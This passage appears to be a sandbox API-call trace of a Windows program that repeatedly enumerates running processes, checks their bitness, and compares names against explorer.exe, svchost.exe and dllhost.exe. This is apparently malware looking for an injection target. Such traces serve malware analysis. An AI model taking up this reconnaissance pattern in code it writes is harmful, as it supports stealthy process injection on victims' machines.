th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0219.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0219.462] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.462] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.462] CloseHandle (hObject=0xec) returned 1 [0219.463] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0219.463] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0219.463] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0219.463] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0219.463] CloseHandle (hObject=0xe8) returned 1 [0219.463] Sleep (dwMilliseconds=0x3e8) [0220.468] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0220.470] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0220.470] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0220.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0220.471] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0220.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0220.471] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0220.472] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0220.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0220.472] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0220.473] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0220.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0220.473] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0220.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0220.474] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0220.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0220.474] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0220.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0220.475] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0220.475] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0220.476] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0220.476] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0220.477] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0220.479] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0220.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0220.480] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0220.480] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0220.481] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0220.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0220.481] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.481] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.481] CloseHandle (hObject=0xec) returned 1 [0220.481] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0220.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0220.482] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0220.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0220.482] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.482] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.482] CloseHandle (hObject=0xec) returned 1 [0220.482] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0220.483] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0220.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0220.483] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0220.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0220.484] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.484] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.484] CloseHandle (hObject=0xec) returned 1 [0220.484] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0220.484] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0220.484] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0220.484] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0220.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0220.485] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.485] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.485] CloseHandle (hObject=0xec) returned 1 [0220.485] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0220.485] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0220.485] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0220.485] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0220.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0220.485] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.485] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.485] CloseHandle (hObject=0xec) returned 1 [0220.486] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0220.486] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0220.486] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0220.486] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0220.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0220.486] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.486] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.486] CloseHandle (hObject=0xec) returned 1 [0220.486] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0220.486] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0220.486] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0220.486] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0220.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0220.487] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.487] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.487] CloseHandle (hObject=0xec) returned 1 [0220.487] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0220.487] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0220.487] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0220.487] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0220.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0220.487] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.487] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.487] CloseHandle (hObject=0xec) returned 1 [0220.488] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0220.488] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0220.488] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0220.488] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0220.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0220.488] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.488] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.488] CloseHandle (hObject=0xec) returned 1 [0220.488] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0220.488] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0220.488] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0220.488] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0220.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0220.489] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.489] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.489] CloseHandle (hObject=0xec) returned 1 [0220.489] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0220.489] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0220.489] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0220.489] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0220.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0220.490] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.490] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.490] CloseHandle (hObject=0xec) returned 1 [0220.490] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0220.490] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0220.490] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0220.490] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0220.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0220.490] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.490] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.490] CloseHandle (hObject=0xec) returned 1 [0220.490] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0220.490] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0220.490] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0220.490] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0220.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0220.491] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.491] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.491] CloseHandle (hObject=0xec) returned 1 [0220.491] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0220.491] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0220.491] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0220.491] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0220.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0220.492] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.492] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.492] CloseHandle (hObject=0xec) returned 1 [0220.492] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0220.492] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0220.492] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0220.492] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0220.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0220.492] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.492] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.492] CloseHandle (hObject=0xec) returned 1 [0220.492] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0220.492] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0220.492] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0220.492] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0220.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0220.493] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.493] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.493] CloseHandle (hObject=0xec) returned 1 [0220.493] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0220.493] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0220.493] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0220.493] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0220.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0220.494] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.494] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.494] CloseHandle (hObject=0xec) returned 1 [0220.494] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0220.494] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0220.494] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0220.494] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0220.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0220.494] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.494] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.494] CloseHandle (hObject=0xec) returned 1 [0220.494] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0220.494] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0220.495] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0220.495] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0220.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0220.495] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: 